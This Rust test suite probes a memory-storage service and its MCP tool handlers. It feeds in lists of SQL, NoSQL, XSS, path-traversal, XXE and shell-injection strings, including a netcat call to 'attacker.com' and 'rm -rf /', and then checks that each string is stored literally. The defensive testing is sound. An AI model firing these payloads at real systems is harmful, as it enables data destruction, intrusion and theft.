use crate::common::TestDatabaseManager;
use anyhow::Result;
use codex_memory::{mcp_server::MCPHandlers, Storage};
use serde_json::json;
use std::sync::Arc;
#[tokio::test]
async fn test_sql_injection_protection() -> Result<()> {
let mut manager = TestDatabaseManager::new()?;
let pool = manager.setup_test_database().await?;
let storage = Arc::new(Storage::new(pool));
let buffer_overflow_attempt = "A".repeat(10000) + "'; DROP TABLE memories; --";
let injection_payloads = vec![
"'; DROP TABLE memories; --",
"' OR '1'='1",
"'; DELETE FROM memories; --",
"' UNION SELECT * FROM memories; --",
"admin'--",
"' OR 1=1 --",
"'; INSERT INTO memories VALUES ('injected'); --",
"' OR 'x'='x",
"'; UPDATE memories SET content='hacked' WHERE '1'='1'; --",
"' UNION SELECT password FROM users WHERE '1'='1'; --",
"'; TRUNCATE memories; --",
"' OR (SELECT COUNT(*) FROM memories) > 0; --",
"'; WAITFOR DELAY '00:00:10'; --",
"' OR (SELECT SLEEP(5)) --",
"' AND (SELECT SUBSTRING(version(),1,1))='5'; --",
"' AND (SELECT COUNT(*) FROM memories) > 0; --",
"' AND extractvalue(1, concat(0x7e, version(), 0x7e)); --",
"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); --",
"{'$ne': null}",
"{'$gt': ''}",
"'; db.memories.drop(); //",
"test'; INSERT INTO memories (content) VALUES ('injected content'); --",
"%27; DROP TABLE memories; --",
"\\'; DROP TABLE memories; --",
"\"; DROP TABLE memories; --",
"test'+'test'; DROP TABLE memories; --",
"CHAR(39)+CHAR(59)+DROP+TABLE+memories+CHAR(59)+CHAR(45)+CHAR(45)",
"'; COPY memories TO '/tmp/hack.txt'; --",
"'; CREATE FUNCTION malicious() RETURNS VOID AS $$ BEGIN RAISE NOTICE 'hacked'; END; $$ LANGUAGE plpgsql; --",
&buffer_overflow_attempt,
];
println!(
"Testing {} SQL injection payloads...",
injection_payloads.len()
);
let initial_stats = storage.stats().await?;
let initial_memory_count = initial_stats.total_memories;
for (i, payload) in injection_payloads.iter().enumerate() {
println!(
"Testing payload #{}: {}",
i + 1,
payload.chars().take(50).collect::<String>()
);
let result = storage
.store(
payload,
format!("Context for injection test #{}", i + 1),
"Safe summary".to_string(),
Some(vec!["injection-test".to_string()]),
)
.await;
match result {
Ok(id) => {
println!(" ✅ Payload stored safely (injection blocked)");
let retrieved = storage
.get(id)
.await?
.expect("Should retrieve injected content");
assert_eq!(
retrieved.content, *payload,
"Malicious content should be stored as literal text"
);
let current_stats = storage.stats().await?;
assert!(
current_stats.total_memories > initial_memory_count,
"Memory count should have increased normally"
);
}
Err(e) => {
println!(" ⚠️ Payload rejected: {}", e);
}
}
let context_result = storage
.store(
&format!("Safe content for context test #{}", i + 1),
payload.to_string(),
"Safe summary".to_string(),
Some(vec!["context-injection-test".to_string()]),
)
.await;
if let Ok(id) = context_result {
let retrieved = storage
.get(id)
.await?
.expect("Should retrieve context injection test");
assert_eq!(
retrieved.context, *payload,
"Malicious context should be stored as literal text"
);
}
let tag_result = storage
.store(
&format!("Safe content for tag test #{}", i + 1),
"Safe context".to_string(),
"Safe summary".to_string(),
Some(vec![payload.to_string(), "tag-injection-test".to_string()]),
)
.await;
if let Ok(id) = tag_result {
let retrieved = storage
.get(id)
.await?
.expect("Should retrieve tag injection test");
assert!(
retrieved.tags.contains(&payload.to_string()),
"Malicious tag should be stored as literal text"
);
}
}
let final_stats = storage.stats().await?;
println!("Database integrity check:");
println!(" Initial memories: {}", initial_memory_count);
println!(" Final memories: {}", final_stats.total_memories);
println!(
" Memories added: {}",
final_stats.total_memories - initial_memory_count
);
assert!(
final_stats.total_memories > initial_memory_count,
"Database should contain new memories (injections stored safely)"
);
let recovery_id = storage
.store(
"Post-injection recovery test",
"Normal context".to_string(),
"Normal summary".to_string(),
Some(vec!["recovery".to_string()]),
)
.await?;
let recovery_content = storage
.get(recovery_id)
.await?
.expect("Should retrieve recovery content");
assert_eq!(recovery_content.content, "Post-injection recovery test");
println!("✅ All SQL injection tests passed - database remains secure");
manager.cleanup().await?;
Ok(())
}
#[tokio::test]
async fn test_mcp_json_injection_protection() -> Result<()> {
let mut manager = TestDatabaseManager::new()?;
let pool = manager.setup_test_database().await?;
let storage = Arc::new(Storage::new(pool));
let handlers = MCPHandlers::new(storage.clone());
let large_json_payload = "A".repeat(100000) + r#"","malicious":"payload"#;
let overflow_attempt1 = "A".repeat(65536);
let overflow_attempt2 = "\x7F".repeat(1000);
let json_injection_payloads = vec![
r#"{"malicious": "value"}, {"content": "injected"#,
r#"content"; DROP TABLE memories; --"#,
r#"\"; DROP TABLE memories; --"#,
r#"test\","malicious":"value"#,
r#"test\n\r\t\","evil":"payload"#,
r#"test\u0022,\u0022malicious\u0022:\u0022value\u0022"#,
r#"test\u0027; DROP TABLE memories; --"#,
"test\x00\x01\x02\x03",
"test\n\r\t\0",
&large_json_payload,
r#"{"nested": {"malicious": "DROP TABLE memories"}}"#,
r#"[{"injection": "attempt"}]"#,
r#"<script>alert('xss')</script>"#,
r#"javascript:alert('xss')"#,
r#"onload=alert('xss')"#,
r#"../../../etc/passwd"#,
r#"..\..\..\..\windows\system32\config\sam"#,
r#"; rm -rf /; --"#,
r#"| nc attacker.com 1234"#,
r#"& ping attacker.com"#,
r#"%s%s%s%s%s%s%s%s"#,
r#"%x%x%x%x%x%x%x%x"#,
&overflow_attempt1,
&overflow_attempt2,
];
println!(
"Testing {} JSON injection payloads through MCP...",
json_injection_payloads.len()
);
let _initial_stats = storage.stats().await?;
for (i, payload) in json_injection_payloads.iter().enumerate() {
println!(
"Testing JSON payload #{}: {}",
i + 1,
payload.chars().take(50).collect::<String>().escape_debug()
);
let params = json!({
"content": payload,
"context": format!("Context with potential injection #{}", i + 1),
"summary": "Safe summary",
"tags": [format!("json-injection-{}", i + 1)]
});
let result = handlers.handle_tool_call("store_memory", params).await;
match result {
Ok(response) => {
println!(" ✅ Payload handled safely");
if let Some(id) = response["id"].as_str() {
let retrieved = storage
.get(uuid::Uuid::parse_str(id)?)
.await?
.expect("Should retrieve injected content");
assert_eq!(
retrieved.content, *payload,
"Malicious payload should be stored as literal content"
);
assert_eq!(
retrieved.context,
format!("Context with potential injection #{}", i + 1)
);
}
}
Err(e) => {
println!(" ⚠️ Payload rejected: {}", e);
}
}
let context_injection_params = json!({
"content": format!("Safe content #{}", i + 1),
"context": payload,
"summary": "Safe summary for context injection test",
"tags": ["context-injection"]
});
let _ = handlers
.handle_tool_call("store_memory", context_injection_params)
.await;
let tag_injection_params = json!({
"content": format!("Safe content for tag injection #{}", i + 1),
"context": "Safe context for tag injection test",
"summary": "Safe summary for tag injection test",
"tags": [payload, "tag-injection"]
});
let _ = handlers
.handle_tool_call("store_memory", tag_injection_params)
.await;
}
let recovery_params = json!({
"content": "MCP recovery test after injection attempts",
"context": "Normal context",
"summary": "Normal summary",
"tags": ["recovery", "mcp"]
});
let recovery_result = handlers
.handle_tool_call("store_memory", recovery_params)
.await;
assert!(
recovery_result.is_ok(),
"MCP handlers should remain functional after injection tests"
);
println!("✅ All JSON injection tests passed - MCP interface remains secure");
manager.cleanup().await?;
Ok(())
}
#[tokio::test]
async fn test_parameter_validation_security() -> Result<()> {
let mut manager = TestDatabaseManager::new()?;
let pool = manager.setup_test_database().await?;
let storage = Arc::new(Storage::new(pool));
let handlers = MCPHandlers::new(storage.clone());
println!("Testing parameter validation security...");
let oversized_tests = vec![
(
"huge_content",
json!({
"content": "A".repeat(50_000_000), "context": "Test context",
"summary": "Test summary"
}),
),
(
"huge_context",
json!({
"content": "Normal content",
"context": "B".repeat(10_000_000), "summary": "Test summary"
}),
),
(
"huge_summary",
json!({
"content": "Normal content",
"context": "Test context",
"summary": "C".repeat(5_000_000) }),
),
(
"huge_tag_array",
json!({
"content": "Normal content",
"context": "Test context",
"summary": "Test summary",
"tags": (0..100000).map(|i| format!("tag{}", i)).collect::<Vec<_>>()
}),
),
(
"huge_tag_names",
json!({
"content": "Normal content",
"context": "Test context",
"summary": "Test summary",
"tags": vec!["D".repeat(1_000_000)] }),
),
];
for (test_name, params) in oversized_tests {
println!("Testing oversized parameter: {}", test_name);
let start = std::time::Instant::now();
let result = tokio::time::timeout(
std::time::Duration::from_secs(30),
handlers.handle_tool_call("store_memory", params),
)
.await;
let duration = start.elapsed();
match result {
Ok(Ok(_)) => {
println!(" ⚠️ {} was accepted (potential DoS risk)", test_name);
println!(" Processing time: {:?}", duration);
}
Ok(Err(e)) => {
println!(" ✅ {} rejected: {}", test_name, e);
let error_msg = e.to_string().to_lowercase();
println!(" Rejection reason: {}", error_msg);
}
Err(_) => {
println!(" ✅ {} timed out (DoS protection working)", test_name);
}
}
let recovery_result = handlers
.handle_tool_call(
"store_memory",
json!({
"content": format!("Recovery after {} test", test_name),
"context": "Test recovery context",
"summary": "Test recovery summary",
"tags": ["recovery"]
}),
)
.await;
assert!(
recovery_result.is_ok(),
"System should remain responsive after oversized parameter test"
);
}
let malformed_tests = vec![
("null_content", json!({"content": null})),
("array_content", json!({"content": ["not", "a", "string"]})),
("object_content", json!({"content": {"not": "a string"}})),
("number_content", json!({"content": 123456})),
("boolean_content", json!({"content": true})),
("number_context", json!({"content": "test", "context": 123})),
(
"array_summary",
json!({"content": "test", "summary": ["not", "string"]}),
),
(
"string_tags",
json!({"content": "test", "tags": "not an array"}),
),
(
"mixed_type_tags",
json!({"content": "test", "tags": [123, true, null, {"object": "tag"}]}),
),
];
for (test_name, params) in malformed_tests {
println!("Testing malformed parameter: {}", test_name);
let result = handlers.handle_tool_call("store_memory", params).await;
match result {
Ok(_) => {
println!(" ⚠️ {} was accepted (type coercion occurred)", test_name);
}
Err(e) => {
println!(" ✅ {} rejected: {}", test_name, e);
let error_msg = e.to_string().to_lowercase();
assert!(
error_msg.contains("missing")
|| error_msg.contains("invalid")
|| error_msg.contains("type")
|| error_msg.contains("parameter"),
"Error should describe validation issue"
);
}
}
}
println!("✅ Parameter validation security tests completed");
manager.cleanup().await?;
Ok(())
}
#[tokio::test]
async fn test_content_sanitization_security() -> Result<()> {
let mut manager = TestDatabaseManager::new()?;
let pool = manager.setup_test_database().await?;
let storage = Arc::new(Storage::new(pool));
let emoji_spam = "\u{1F600}".repeat(10000);
let dangerous_content = vec![
"\x00\x01\x02\x03\x7F\x7E\x7D\x7C",
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F",
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1A\x1B\x1C\x1D\x1E\x1F",
"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",
"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x",
"%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n",
"; rm -rf / #",
"| nc attacker.com 1234",
"& ping evil.com",
"`whoami`",
"$(id)",
"${HOME}",
"<script>alert('xss')</script>",
"javascript:alert('xss')",
"data:text/html,<script>alert('xss')</script>",
"vbscript:msgbox('xss')",
"*)(uid=*",
"*)(|(mail=*",
"*)(&(password=*",
"<?xml version='1.0'?><!DOCTYPE root [<!ENTITY % remote SYSTEM 'http://attacker.com/evil.dtd'>%remote;]>",
"../../../etc/passwd",
"..\\..\\..\\windows\\system32\\config\\sam",
"/etc/shadow",
"C:\\Windows\\System32\\drivers\\etc\\hosts",
"innocent.txt\x00.evil",
"safe\x00malicious",
"\u{202E}\u{0644}\u{0645}\u{0646}\u{202D}", "\u{FEFF}", "\u{200B}\u{200C}\u{200D}",
&emoji_spam,
"раураl.com", "аррӏе.com", ];
println!(
"Testing {} dangerous content samples...",
dangerous_content.len()
);
for (i, content) in dangerous_content.iter().enumerate() {
println!(
"Testing dangerous content #{}: {}",
i + 1,
content
.escape_debug()
.to_string()
.chars()
.take(50)
.collect::<String>()
);
let result = storage
.store(
content,
format!("Context for dangerous content #{}", i + 1),
"Safe summary".to_string(),
Some(vec!["dangerous-content".to_string()]),
)
.await;
match result {
Ok(id) => {
println!(" ✅ Dangerous content stored safely");
let retrieved = storage
.get(id)
.await?
.expect("Should retrieve dangerous content");
assert_eq!(
retrieved.content.as_bytes(),
content.as_bytes(),
"Dangerous content should be stored exactly as provided"
);
println!(" ✅ Content retrieved exactly as stored (not interpreted)");
}
Err(e) => {
println!(" ⚠️ Dangerous content rejected: {}", e);
}
}
}
let stats = storage.stats().await?;
println!("Database stats after dangerous content tests:");
println!(" Total memories: {}", stats.total_memories);
let safe_id = storage
.store(
"Safe content after dangerous content tests",
"Normal context".to_string(),
"Normal summary".to_string(),
Some(vec!["safe".to_string()]),
)
.await?;
let safe_content = storage
.get(safe_id)
.await?
.expect("Should retrieve safe content");
assert_eq!(
safe_content.content,
"Safe content after dangerous content tests"
);
println!("✅ Content sanitization security tests passed");
manager.cleanup().await?;
Ok(())
}
#[tokio::test]
async fn test_resource_exhaustion_attacks() -> Result<()> {
let mut manager = TestDatabaseManager::new()?;
let pool = manager.setup_test_database().await?;
let storage = Arc::new(Storage::new(pool));
let handlers = Arc::new(MCPHandlers::new(storage.clone()));
println!("Testing resource exhaustion attack protection...");
println!("Testing rapid fire request protection...");
let rapid_fire_count = 200;
let mut handles = vec![];
let start = std::time::Instant::now();
for i in 0..rapid_fire_count {
let handlers_clone = handlers.clone();
let handle = tokio::spawn(async move {
let params = json!({
"content": format!("Rapid fire test {}", i),
"context": format!("Rapid fire test context {}", i),
"summary": format!("Rapid fire test summary {}", i),
"tags": ["rapid-fire", "dos-test"]
});
handlers_clone
.handle_tool_call("store_memory", params)
.await
});
handles.push(handle);
}
let mut successes = 0;
let mut failures = 0;
let mut timeouts = 0;
for handle in handles {
match tokio::time::timeout(std::time::Duration::from_secs(30), handle).await {
Ok(Ok(Ok(_))) => successes += 1,
Ok(Ok(Err(_))) => failures += 1,
Ok(Err(_)) => failures += 1,
Err(_) => timeouts += 1,
}
}
let duration = start.elapsed();
let rate_limit_triggered =
failures > (rapid_fire_count / 2) || timeouts > (rapid_fire_count / 4);
println!("Rapid fire results:");
println!(" Duration: {:?}", duration);
println!(" Successes: {}", successes);
println!(" Failures: {}", failures);
println!(" Timeouts: {}", timeouts);
println!(" Rate limiting triggered: {}", rate_limit_triggered);
assert!(successes > 0, "Some requests should succeed");
if rate_limit_triggered {
println!(" ✅ Rate limiting protection working");
} else {
println!(" ✅ System handled rapid requests without rate limiting");
}
println!("Testing memory exhaustion protection...");
let memory_bomb_sizes = vec![
1_000_000, 5_000_000, 10_000_000, 50_000_000, ];
for size in memory_bomb_sizes {
println!(" Testing {}MB payload...", size / 1_000_000);
let large_content = "X".repeat(size);
let start = std::time::Instant::now();
let result = tokio::time::timeout(
std::time::Duration::from_secs(60),
handlers.handle_tool_call(
"store_memory",
json!({
"content": large_content,
"context": "Memory bomb test context",
"summary": "Memory bomb test summary",
"tags": ["memory-bomb"]
}),
),
)
.await;
let duration = start.elapsed();
match result {
Ok(Ok(_)) => {
println!(
" ⚠️ {}MB payload accepted (potential memory risk)",
size / 1_000_000
);
println!(" Processing time: {:?}", duration);
}
Ok(Err(e)) => {
println!(" ✅ {}MB payload rejected: {}", size / 1_000_000, e);
}
Err(_) => {
println!(
" ✅ {}MB payload timed out (protection working)",
size / 1_000_000
);
}
}
let health_check = handlers
.handle_tool_call(
"store_memory",
json!({
"content": format!("Health check after {}MB test", size / 1_000_000),
"context": "Health check context",
"summary": "Health check summary",
"tags": ["health-check"]
}),
)
.await;
assert!(
health_check.is_ok(),
"System should remain responsive after large payload test"
);
}
println!("Testing connection exhaustion protection...");
let connection_bomb_count = 100;
let mut connection_handles = vec![];
for i in 0..connection_bomb_count {
let storage_clone = storage.clone();
let handle = tokio::spawn(async move {
tokio::time::sleep(std::time::Duration::from_millis(100)).await;
storage_clone
.store(
&format!("Connection bomb test {}", i),
"Test context".to_string(),
"Test summary".to_string(),
None,
)
.await
});
connection_handles.push(handle);
}
let mut connection_successes = 0;
let mut connection_failures = 0;
for handle in connection_handles {
match tokio::time::timeout(std::time::Duration::from_secs(30), handle).await {
Ok(Ok(Ok(_))) => connection_successes += 1,
Ok(Ok(Err(_))) => connection_failures += 1,
Ok(Err(_)) => connection_failures += 1,
Err(_) => connection_failures += 1,
}
}
println!("Connection exhaustion results:");
println!(" Successes: {}", connection_successes);
println!(" Failures: {}", connection_failures);
assert!(
connection_successes > (connection_bomb_count * 70 / 100),
"Should handle reasonable connection load"
);
println!("✅ Resource exhaustion attack protection tests completed");
manager.cleanup().await?;
Ok(())
}